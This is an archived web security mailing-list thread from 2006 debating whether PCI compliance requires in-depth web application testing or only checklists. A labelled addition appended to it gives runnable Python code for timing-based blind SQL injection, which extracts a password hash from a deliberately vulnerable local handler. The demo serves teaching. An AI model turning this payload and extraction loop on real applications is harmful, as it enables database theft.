[WEB SECURITY] RE: MasterCard backs off Security, Leave Cardholders at Risk

Evans, Arian Arian.Evans at fishnetsecurity.com
Thu Jun 8 18:50:44 EDT 2006


> From: Craig Wright [mailto:cwright at bdosyd.com.au] 
> Sent: Thursday, June 08, 2006 5:05 PM
> To: Evans, Arian; webappsec at securityfocus.com
> Subject: RE: MasterCard backs off Security, Leave Cardholders at Risk
> 
> 
> There are levels to the PCI. The high volume clients have to be tested
> in depth. Most have only a simple test.

I understand there are different levels. I read it thoroughly
the other day. I saw nothing like what was said below, namely:
"a full scale in depth web application test as defined in the
PCI Security Audit" or a distinction between "in depth" and
"simple test". I saw checklists that anyone could cover with
roughly ZERO knowledge of webappsec.

Unless I read it wrong, there were two checkboxes, one for
"did they get a web app assessment?" and one for "did they
get some training?", and the additional details required at
various tiers consisted of further controls checkboxes.

Pretty much exactly what I stated in my original response.

So, does PCI have anything concerning webappsec beyond checking
the "they had a webapp audit" |/ and "they had training" |/
boxes, and some general controls (passwords, encryption,
shaken not stirred) requirements?

I guess I should ask our PCI guys, but I figured someone
on this list would/should know off the top of their head.

I'll ask folks who work with this and report back.

-ae


> -----Original Message-----
> From: Evans, Arian [mailto:Arian.Evans at fishnetsecurity.com]
> Sent: Thursday, 8 June 2006 5:53 AM
> To: webappsec at securityfocus.com
> Subject: RE: MasterCard backs off Security, Leave Cardholders at Risk
> 
> Correct me if I'm wrong, but there is no such thing in PCI
> as "a full scale in depth web application test", as nice
> as that sounds.
> 
> IIRC, it's a generic BITS/Roundtable type checklist, "do
> you have passwords" kind of stuff.
> 
> One of the checklist items is "was an assessment performed
> that evaluated [insert OWASP Top-10]". Another checklist
> item was "are a [smattering] of [software developer types]
> trained on the [insert OWASP Top-10]?"
> 
> This is due diligence. Not a bad thing, to be true, but
> how is a checklist auditor going to know if the group that
> assessed the application knew how to test for blind SQL
> Injection, and timing-based inference (SQL Injection or
> otherwise), let alone buffer overflows, properly encoded
> XSS/script strings, or if they just clicked "scan"?
> 
> That's a huge difference, and far from leaving me with
> a warm fuzzy. I've seen such a huge variance in reports
> from vendors performing webappsec assessments it's shocking
> (or maybe not); at least two were worse than if they'd
> just gotten a commercial webapp scanner and clicked "scan".
> 
> However, it's a start. To be sure. Gotta start somewhere.
> 
> </insert_random_sql_syntax_check></check_requirements_box>
> 
> -ae
> 
> > -----Original Message-----
> > From: fscwi at hotmail.com [mailto:fscwi at hotmail.com]
> > Sent: Wednesday, June 07, 2006 8:58 AM
> > To: webappsec at securityfocus.com
> > Subject: Re: MasterCard backs off Security, Leave Cardholders at Risk
> >
> > This only applies to the requirements for PCI vulnerability
> > scanning.  All applications involved with processing credit
> > card transactions must still undergo a full scale in depth
> > web application test as defined in the PCI Security Audit
> > Standard.  The difference is the web application security
> > test standard states it must be done on an annual basis, and
> > can be done by either an outside vendor or using internal
> > staff.  Vulnerability scanning on the other hand must be done on
> > a quarterly basis (for most merchants) by an outside service
> > provider that has been evaluated and approved by MasterCard.
> 
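The distinction Arian draws above, between a scanner that greps responses for database error text and a tester who knows how to run timing-based inference for blind SQL injection, as an added worked example. This is not code from the thread or from any PCI material. The vulnerable login handler, the users table, the secret hash value and the sqlite sleep() user function are all constructed for illustration; sleep() stands in for MySQL SLEEP() or MSSQL WAITFOR DELAY, which a real target would provide natively.

```python
import sqlite3
import time

# Constructed for this example: the delay the injected payload requests, and the
# threshold the attacker uses to decide whether the database slept.
SLEEP_SECONDS = 0.03
THRESHOLD = SLEEP_SECONDS / 2


def build_db():
    """In-memory database with one user. sqlite has no SLEEP(), so a sleep()
    function is registered to stand in for MySQL SLEEP() / MSSQL WAITFOR DELAY."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    conn.execute("CREATE TABLE users (username TEXT, pw_hash TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'd3adb33f')")  # constructed secret
    return conn


def vulnerable_login(conn, username):
    """Deliberately vulnerable: user input is concatenated into the query, but
    every database error is swallowed, so the response body never leaks anything."""
    sql = "SELECT 1 FROM users WHERE username = '%s'" % username
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "Login failed"
    return "Welcome" if row else "Login failed"


def naive_error_scan(conn):
    """The 'click scan' check: send a stray quote and grep for database error text.
    Against this handler it finds nothing, because no error text is ever returned."""
    body = vulnerable_login(conn, "'")
    return any(marker in body for marker in ("syntax error", "SQL", "sqlite"))


def oracle(conn, condition):
    """Answer a yes/no question about the database using only response time:
    the payload makes the database sleep exactly when `condition` is true."""
    payload = ("admin' AND CASE WHEN (%s) THEN sleep(%g) ELSE 0 END AND '1'='1"
               % (condition, SLEEP_SECONDS))
    t0 = time.perf_counter()
    vulnerable_login(conn, payload)
    return (time.perf_counter() - t0) > THRESHOLD


def extract(conn, column="pw_hash", where="username='admin'", max_len=32):
    """Recover a column value one character at a time via the timing oracle:
    first the length, then each character by binary search over printable ASCII."""
    target = "(SELECT %s FROM users WHERE %s)" % (column, where)
    length = 0
    for n in range(1, max_len + 1):
        if not oracle(conn, "length(%s) >= %d" % (target, n)):
            break
        length = n
    recovered = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, "unicode(substr(%s, %d, 1)) > %d" % (target, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        recovered.append(chr(lo))
    return "".join(recovered)


if __name__ == "__main__":
    db = build_db()
    print("error-string scan finds injection:", naive_error_scan(db))
    print("timing oracle recovers pw_hash   :", extract(db))
```

Both checks hit the same injectable parameter; the error-string scan reports the handler clean while the timing oracle walks the whole hash out of it, which is the gap a "was an assessment performed" checkbox cannot see. Against a real network target the single-measurement threshold used here is too optimistic: jitter means each question should be asked several times, or the delay set well above the observed response-time variance.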

----------------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/



More information about the websecurity mailing list